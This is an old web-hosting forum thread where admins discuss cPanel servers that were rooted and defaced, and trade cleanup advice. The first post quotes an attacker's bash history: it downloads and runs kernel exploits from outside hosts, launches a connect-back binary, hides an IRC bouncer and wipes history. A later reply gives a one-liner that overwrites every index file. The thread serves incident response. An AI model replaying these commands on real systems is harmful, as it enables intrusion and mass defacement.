new server got hacked

[brumie]

just got hacked
moving to new server and after few hours got hacked

all index.* has been replaced
including all cpanel themes and all clients

so when u logged on http://server/cpanel
http://server/webmail
all you see is the hacker page
http://vipixel.com/hacked.jpg

I can delete the username techteam which uid is 0
but how to remove the hidden Trojan?
says it has hidden pid

uid 0 account (techteam) - BAD!
--> Hidden Pid detected! [pid 10]
--> hidden from ps: [yes]
--> hidden from kernel: [yes]

here's the log i can grab:

ls
./pt
./kmod
./own
./klogd
./kmod
rm kmod
rm -rf kmod
wget [url]www.viperhaxu.hpg.com.br/ptrace[/url]
chmod ptrace
chmod 777 ptrace
./ptrace
wget [url]www.skater0x.hpg.com.br/local/kmod[/url]
chmod 777 kmod.1
./kmod.1
./newlocal
gcc fedor.c -o fedor
ls
./f
uname -a
chmod 777 f
./f
id
pwd
wget [url]www.skater0x.hpg.com.br/xpll/cancer[/url]
echo SU3D OWNZ > index.txt
chmod 777 cancer
./cancer index.txt
ls
rm bind.txt
ls -la
cat .bash_history
ls
./kmod
./cbd
./cbd 10.28.88.142
cat fedor.c
./f
./ptrace
c
./pt
z
ls
ls
./setuid
id
./ptrace
./own
./ptrace
wget [url]www.creatividade.hpg.com.br/locals[/url]
chmod 777 locals
./locals
./locals
./locals
rm -rf locals
ls
./ptrace
echo lol >.bash_history
ls
./td
id
./pt
id
./td
ls
w
id
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c83
wget thecoreteam.home.ro/pt
chmod +x pt
./pt
./pt
./pt
./pt
./pt
wget [url]www.geocities.com/sorin_smen/psybnc.tgz[/url]
ls
rm -rf *
cd ..
ls
rm -rf *
ls
./newlocal
./localroot
./own
./kmod
rm -rf *
chmod +wrx setuid
id
ls -all
ls
rm -rf sess_fc187590539417321dd72b37686e7e27
cd [url]www.geocities.com/sorin_smen/psybnc.tgz[/url]
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c82
mkdir sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
cd sess_ff65a18f2fbe9e2e1346ea32e1fc1c84
wget [url]www.geocities.com/sorin_smen/psybnc.tgz[/url]
tar zxvf psybnc.tgz
cd psybnc
./psybnc
kill -9 32751
rm -rf psybnc.conf
wget thecoreteam.home.ro/psybnc.conf
mv psybnc "squid -D"
./"squid -D"
exit
id
./km
ls
ls -al km
./km
./km
./km;./km;./km
exit

i run this:
[~/apps/chkrootkit-0.42b]# ./chkrootkit
Checking `bindshell'... INFECTED (PORTS: 465)
but seem false alarm...

how to clearly remove the trojan file?
please please help.
FYI server updated to latest kernel 2.4.23
but we're still worried about this mass defacement attack.

mind to share tips and tricks security setting for WHM/CPanel?

Thanks in advance,
Brumie

 

[welo]

Someone was working fast then and knew you had a new box that wasn't patched (so it's likely someone you know). I have a friend who had a similar hack done on an unpatched box last spring. It's almost identical. I suggest you get ready to reimage, and be thankful it's a new install so you don't have to worry about complex backups.

 

[hot_wired13]

ok, lets get down to the basics, shall we?

ptrace = LOCAL kernel exploit
kmod = LOCAL kernel exploit

so, how did he get in?
he needed a shell, right?

simple. u must be using redhat9. thats how ptrace+kmod worked. there is a similar exploit called ptrace-km3.c . its both combined together, same way, but alot faster.

if u notice, he was rm-ing files (at the start of the logs). only possibility would be cos the exploits dont work. that means 2 things - 1. this is his first attempt on ur box (or at least after the install) 2. he's an idiot who has bad memory. hackers do not usually rm their tools. they keep it for future use

now, how did he get a shell on your box? simple. redhat9 has a REMOTE amba exploit which spawns a user on the box. check your system logs, maybe u'd get a clue. if he's such an idiot who doesnt clear bash history, u can bet he wont clear system logs.

also, the fact that he heeps using .com.br free webhosts (probably free, at least) most probably shows that he is living in .br. same thing with romanians, they love to use .ro freehosts. its faster for them to upload xploits. (well, the clever hacker would use a carded domain and his own server. wont be so stupid to use a freehost - logs are all over the place)

anyways, he didn do a clean job, notice the chmodding and ****. if i were him, i'd write a ready made bash script, to provide me all the info i need. so u'd see almost nothing

hmm, below are some *GUESSES* on what each file does:

cancer = spreads whatever is in index.txt to every single index.* file. very very very lame file. in my opinion.

psybnc = as it says, a irc bouncer.

setuid = possible too to change his own userid? to change his uid to 0 so he'd be root

"squid -D" = psybnc, as i said above, disguised as a squid proxy. could also imply that he has USED squid to setup proxies on other box and is familiar with the commands.

newlocal and localroot = sounds like a rootkit to me

oh, and yes, theres something about kmod and ptrace - the exploitation is NOT instant, requires some time, but the ptrace-kmod3 is instant i think, havent used it in a long time

seriously, i think he has patched your box, maybe thats why he was runnin km at the last part? hackers dont like other hackers in their box, lol.

ok... now, how to track him down and kill him. 1. dont format the box... yet.
2. check out his psybnc stuff, as in the now, squid -D...
3. check out the psybnc.conf. no point lookin at the wget'ed copy, cos its a generic one. his password should be encrypted, but oh well... better than nothing.
4. add another ADMIN account to the psybnc conf and rehash it.
5. go in there, and wait wait wait, until he comes in. since u're admin, u should be able to see his real ip address...
6. call the feds

et voila. there, u caught ur hacker.
however, removal of rootkit is not exactly easy, lots of memory hooks and stuff.

prevention: ALWAYS use up2date if u're with redhat... set crons every 3 hours for up2date -p and 5 mins later up2date -u, should keep u very safe.

erm, if im wrong about anything, someone feel free to correct me. thanks. if anyone needs help, im available at kelvin [at] hostform.net.

regards,
kelvin
hostform internet services

 

[damainman]

You think i could borrow some of your knowledge and put it in my brain for awhile...

How long did it take you to learn all that?.. Any suggestions, sites, resources u can provide that will help keep out boxes secure.

I'm currently running RH9+APF+Tripwire.... but i'm still clueless to how to effectly check logs and maintain APF and tripwire....

Thanks in advance

 

[Nico]

These SOB's have hit a few other servers this week. So far all I've found is the t0rn root kit installed and all the index.* files replaced. You can correct all the Cpanel index problems by changing your updated prefs to the next release or down a release and /scripts/update now and /scripts/upcp. Then I rm -rf /home/*/public_html/index*

After that it's time to email the users to replace their index files.

I also reccomend recompiling the Kernel and making sure Apache, PHP etc is currrent.


This is how they replaced the index files:

188 lswget http://www.cimentsorigny.com/rula2.htm
189 wget http://www.cimentsorigny.com/rula2.htm
190 mv rula2.htm index.html
191 find / -name "index.*" -exec cp /tmp/index.html {} \;

 

[brumie]

wow thank you guys for the feedback
hot_wired & Nico
gr8 explaination
that's help me to learn security

sorry for not being clear
it's redhat 7.3
running latest RELEASE tree
i did re-compile the kernel to the latest did some search chkroot and monitoring with iptraf and looks fine.

tail /etc/rc.sysinit
[ -r /proc/ksyms ] && /bin/cat /proc/ksyms) >/var/log/ksyms.0
# create the crash indicator flag to warn on crashes, offer fsck with timeout
touch /.autofsck
sleep 1
kill -TERM `/sbin/pidof getkey` >/dev/null 2>&1
} &
if [ "$PROMPT" != "no" ]; then
/sbin/getkey i && touch /var/run/confirm
fi
wait

looks fine
BUT
today got email from the server:
Trojan Horses Detected by (WHM)
Hidden Pid detected! [pid 10]
hidden from ps: [yes]
hidden from kernel: [yes]
binary location: [/sbin/init]

oh gawd again?
does it will solve the problem if i just replace it with trusted init ?
how the hell I can find the trustable binary init anyway?
If I'm replace with the original init from the CD will this causing problem since I already running update here and there?


Thanks in advance
Brumie

 

[Nico]

I've seen that a few times this week as well.

You can delete that init file and replace it with one from the CD if you can locate it or one from a like server. I have a clean archived version that I have been using PM me if you'd like instructions on how to access and install that one.

 

[hot_wired13]

Originally posted by brumie


sorry for not being clear
it's redhat 7.3

*faints* redhat 7.3? sheesh, thats even MORE buggy than redhat9... not only ptrace works, samba, ssh, proftpd, everything works lol.

actually, i'd reccommend u just backup ur stuff, and reinstall. and BE at the datacenter or be online when that happens. the second after ur box is online, use redhat's up2date. 100% trusted and safe. if, however, u want a redhat paid account for updating purposes... er, email me... kelvin [at] hostform.net... i have a *cough* paid *cough* rhn acc which i dont use anymore, cos i switched to freebsd... ill lend it to u

yea, u could probably replace some files.. however, u never know if theres memory hooks or some stuff running.. thats what im afraid of...

 

[compunet2]

By chance, were you or any of your users running the script My eGallery? You could check the apache logs, which would show it. Also, did you have /tmp set to noexec, nosuid?

 

[brumie]

the tech found it execution from 4images gallery (nobody) to tmp session


and the OS reloaded now :|
just for sure...

thanks all for the help....

 

[ivaserver]

my servr has been hacked

my server has also been hacked by IR4DEX GR0UP

all index files on the server have been defaced and in some account all pages wre defaced

also customers cannot log in to phpmyadmin.

i do not know the full extent of the damage done.

I have been told i need to do a OS reload

where can i get information on how to do this?

Thanks
Ivaserver

 

[brumie]

Re: my servr has been hacked

Originally posted by ivaserver
my server has also been hacked by IR4DEX GR0UP

all index files on the server have been defaced and in some account all pages wre defaced

also customers cannot log in to phpmyadmin.

i do not know the full extent of the damage done.

I have been told i need to do a OS reload

where can i get information on how to do this?

Thanks
Ivaserver

for OS reload, you have to submit ticket to your dedicated provider,
before that you can reinstall the cpanel
rm -rf /usr/local/cpanel/cpanel
/scripts/updatenow
/scripts/upcp
/scripts/updateuserdomains2

that will bring back cpanel including phpmyadmin

if u have backup customer data, u're safe, but if not... oh man hurts restoring all index.*

 

[ivaserver]

Thanks for the help

it has helped a lot

phpmyadmin is now OK

I have just received this email

IMPORTANT: Do not ignore this email.
This message is to inform you that the
account smurf has user id 0 (root privs). This could mean that
your system was compromised (OwN3D). To be safe you should verify that your
system has not be compromised.

in this account there are 5 files

.bash_history

passwd root
[email protected] [~]# passwd root
Changing password for user root.
w




.bash_logout

# ~/.bash_logout

clear




.bash_profile

# .bash_profile

# Get the aliases and functions
if [ -f ~/.bashrc ]; then
. ~/.bashrc
fi

# User specific environment and startup programs

PATH=$PATH:$HOME/bin

export PATH
unset USERNAME





.bashrc

# .bashrc

# User specific aliases and functions

# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi




.emacs

;; Red Hat Linux default .emacs initialization file

;; Are we running XEmacs or Emacs?
(defvar running-xemacs (string-match "XEmacs\\|Lucid" emacs-version))

;; Set up the keyboard so the delete key on both the regular keyboard
;; and the keypad delete the character under the cursor and to the right
;; under X, instead of the default, backspace behavior.
(global-set-key [delete] 'delete-char)
(global-set-key [kp-delete] 'delete-char)

;; Turn on font-lock mode for Emacs
(cond ((not running-xemacs)
(global-font-lock-mode t)
))

;; Visual feedback on selections
(setq-default transient-mark-mode t)

;; Always end a file with a newline
(setq require-final-newline t)

;; Stop at the end of the file, not just add lines
(setq next-line-add-newlines nil)

;; Enable wheelmouse support by default
(cond (window-system
(mwheel-install)
))



Do i just need to remove the account to stop the hackers access?

Thanks Ivaserver

 

[brumie]

oh yes just delete that uid
i seen that too and delete the user line:
pico /etc/passwd

but believe it or not there must be hidden process
run chkrootkit (search on this forum on how to install it)
also check on tmp

cd /tmp
ls -la

find weird unussual files/directory there
but it'll be good if u releod the OS and get kernel update and find some threads about securing whm/cpanel, i found it very usefull

 

[Diatone]

me to

mine got hacked by a group called dogm4 - same crap. I didnt have my kernel updated. Stupid me. First time in 5 years I've gotten hacked. Caught it soon though, and restored sites within the hour. Bastards. I actually was able to find the people who did this, and the IP of them, along with there phone, real e-mail, address, age, city, etc. There in Brazil. Any charges I can file? Anything at all I can do?

 

[Diatone]

http://www.delta5.com.br/mirror/topdefacer/

Those are the fags who got all of us... Trust me. Little HACKING COMPETITION> WOOO HOO FUN STUFF. I want to meet them face to face and see what the punk script kiddies have to say.

 

[compunet2]

Most likely nothing you can do. See: http://grc.com/dos/grcdos.htm
I also had the same thing with TechTeam changing all the index files. I have since upgraded the kernel, changed the permission on the /tmp directory, removed compilers, and blocked their IP range, but would still like to know exactly how they did it, or if any of this would have stopped them. Also, how did you find out so much information about them anyway? Maybe you should make the info public, and see how they like it... lol

 

[ivaserver]

my server provider killed the processes that were started by the hackers. This included a Half-Life server, an ircd and several unknown programs

 

[ivaserver]

deleted

 

[B12Org]

Originally posted by brumie
oh yes just delete that uid
i seen that too and delete the user line:
pico /etc/passwd

but believe it or not there must be hidden process
run chkrootkit (search on this forum on how to install it)
also check on tmp

cd /tmp
ls -la

find weird unussual files/directory there
but it'll be good if u releod the OS and get kernel update and find some threads about securing whm/cpanel, i found it very usefull

What counts as wierd or unusal files/dirs?